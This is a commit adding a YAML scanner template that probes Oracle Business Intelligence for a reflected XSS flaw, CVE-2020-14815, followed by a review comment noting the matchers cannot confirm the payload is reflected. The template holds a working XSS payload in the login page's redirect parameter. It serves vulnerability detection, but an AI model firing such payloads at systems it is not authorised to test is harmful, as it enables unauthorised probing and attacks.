Create CVE-2020-14815.yaml (#836)
parent
3a6cccda48
commit
a998ecd4d2
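--- a/CVE-2020-14815.yaml
+++ b/CVE-2020-14815.yaml
@@ -0,0 +1,26 @@
+id: CVE-2020-14815
+
+info:
+name: Oracle Business Intelligence XSS
+author: pikpikcu
+severity: medium
+reference: https://www.oracle.com/security-alerts/cpuoct2020.html
+tags: cve,cve2020,oracle,xss
+
+# https://twitter.com/HackerOn2Wheels/status/1326927875279380480
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E"
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+- type: word
+words:
+- "X-Oracle-Dms-Ecid:"
+- "X-Oracle-Dms-Rid:"
+part: header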
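Review bot: The matchers never check that the `redirect` payload comes back in the response, so the template reports any host that answers 200 with an Oracle DMS header, including installations that already have the October 2020 CPU applied. The word matcher on `X-Oracle-Dms-Ecid:` / `X-Oracle-Dms-Rid:` only fingerprints the server, and with no `condition: and` on it either header alone appears to satisfy it. I would add a body matcher for the decoded payload and a `text/html` header check, as below. The exact reflected string should be confirmed against a known-vulnerable response before merging.

```yaml
    matchers:
      # … unchanged: status and X-Oracle-Dms-* header matchers …
      - type: word
        part: body
        words:
          - '"><img/src/onerror=alert(document.domain)>'
      - type: word
        part: header
        words:
          - "text/html"
```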